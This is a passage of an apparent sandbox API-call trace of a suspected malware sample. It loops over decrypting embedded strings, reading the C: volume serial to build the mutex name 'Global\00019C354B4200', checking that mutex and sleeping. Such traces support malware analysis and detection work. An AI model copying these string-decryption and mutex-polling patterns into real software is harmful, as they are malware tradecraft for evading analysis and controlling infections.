RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0169.689] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32c68) returned 1 [0169.689] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0169.689] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0169.689] CryptDestroyKey (hKey=0xa32c68) returned 1 [0169.689] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0169.689] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0169.689] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0169.689] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32c68) returned 1 [0169.689] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0169.689] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0169.689] CryptDestroyKey (hKey=0xa32c68) returned 1 [0169.689] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0169.689] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0169.690] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0169.690] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0169.690] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0169.690] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0169.690] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0169.690] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32c68) returned 1 [0169.690] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0169.690] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0169.690] CryptDestroyKey (hKey=0xa32c68) returned 1 [0169.690] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0169.690] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x180 [0169.690] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0x0) returned 0x102 [0169.690] CloseHandle (hObject=0x180) returned 1 [0169.690] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0169.690] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0169.690] Sleep (dwMilliseconds=0x3e8) [0170.703] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0170.703] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32c68) returned 1 [0170.703] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0170.703] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0170.703] CryptDestroyKey (hKey=0xa32c68) returned 1 [0170.703] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0170.703] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0170.703] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0170.703] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32c68) returned 1 [0170.704] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0170.704] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0170.704] CryptDestroyKey (hKey=0xa32c68) returned 1 [0170.704] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0170.704] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0170.704] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0170.704] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0170.704] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0170.704] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0170.704] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0170.704] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32c68) returned 1 [0170.704] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0170.704] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0170.704] CryptDestroyKey (hKey=0xa32c68) returned 1 [0170.704] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0170.704] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x180 [0170.704] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0x0) returned 0x102 [0170.704] CloseHandle (hObject=0x180) returned 1 [0170.704] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0170.704] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0170.704] Sleep (dwMilliseconds=0x3e8) [0171.717] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0171.717] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32c68) returned 1 [0171.717] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0171.717] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0171.717] CryptDestroyKey (hKey=0xa32c68) returned 1 [0171.717] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0171.717] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0171.717] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0171.717] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32c68) returned 1 [0171.717] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0171.717] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0171.717] CryptDestroyKey (hKey=0xa32c68) returned 1 [0171.718] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0171.718] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0171.718] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0171.718] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0171.718] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0171.718] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0171.718] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0171.718] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32c68) returned 1 [0171.718] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0171.718] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0171.718] CryptDestroyKey (hKey=0xa32c68) returned 1 [0171.718] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0171.718] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x180 [0171.718] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0x0) returned 0x102 [0171.718] CloseHandle (hObject=0x180) returned 1 [0171.718] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0171.718] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0171.718] Sleep (dwMilliseconds=0x3e8) [0172.856] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0172.856] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32ca8) returned 1 [0172.856] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0172.856] CryptDecrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0172.856] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0172.856] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0172.856] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0172.856] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0172.856] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32ca8) returned 1 [0172.856] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0172.856] CryptDecrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0172.856] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0172.856] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0172.856] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0172.856] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0172.856] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0172.856] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0172.857] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0172.857] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0172.857] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32ca8) returned 1 [0172.857] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0172.857] CryptDecrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0172.857] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0172.857] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0172.857] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x17c [0172.857] WaitForSingleObject (hHandle=0x17c, dwMilliseconds=0x0) returned 0x102 [0172.857] CloseHandle (hObject=0x17c) returned 1 [0172.857] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0172.857] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0172.857] Sleep (dwMilliseconds=0x3e8) [0173.879] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0173.879] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32d28) returned 1 [0173.879] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0173.879] CryptDecrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0173.879] CryptDestroyKey (hKey=0xa32d28) returned 1 [0173.879] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0173.879] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0173.879] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0173.879] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32d28) returned 1 [0173.879] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0173.879] CryptDecrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0173.879] CryptDestroyKey (hKey=0xa32d28) returned 1 [0173.879] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0173.879] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0173.879] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0173.879] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0173.879] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0173.880] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0173.880] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0173.880] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32d28) returned 1 [0173.880] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0173.880] CryptDecrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0173.880] CryptDestroyKey (hKey=0xa32d28) returned 1 [0173.880] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0173.880] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x140 [0173.880] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x0) returned 0x102 [0173.880] CloseHandle (hObject=0x140) returned 1 [0173.880] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0173.880] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0173.880] Sleep (dwMilliseconds=0x3e8) [0174.897] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0174.897] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32c68) returned 1 [0174.897] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0174.897] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0174.897] CryptDestroyKey (hKey=0xa32c68) returned 1 [0174.897] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0174.897] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0174.897] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0174.897] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32c68) returned 1 [0174.897] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0174.897] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0174.897] CryptDestroyKey (hKey=0xa32c68) returned 1 [0174.897] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0174.897] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0174.897] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0174.897] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0174.897] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0174.897] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0174.897] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0174.897] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32c68) returned 1 [0174.898] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0174.898] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0174.898] CryptDestroyKey (hKey=0xa32c68) returned 1 [0174.898] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0174.898] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x194 [0174.898] WaitForSingleObject (hHandle=0x194, dwMilliseconds=0x0) returned 0x102 [0174.898] CloseHandle (hObject=0x194) returned 1 [0174.898] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0174.898] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0174.898] Sleep (dwMilliseconds=0x3e8) [0176.372] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0176.372] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32968) returned 1 [0176.381] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0176.387] CryptDecrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0176.446] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.446] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0176.446] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0176.446] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0176.446] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32968) returned 1 [0176.446] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0176.446] CryptDecrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0176.446] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.446] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0176.446] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0176.446] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0176.446] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0176.446] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0176.447] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0176.447] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0176.447] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32968) returned 1 [0176.447] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0176.447] CryptDecrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0176.447] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.447] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0176.447] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x15c [0176.447] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x0) returned 0x102 [0176.447] CloseHandle (hObject=0x15c) returned 1 [0176.447] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0176.447] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: 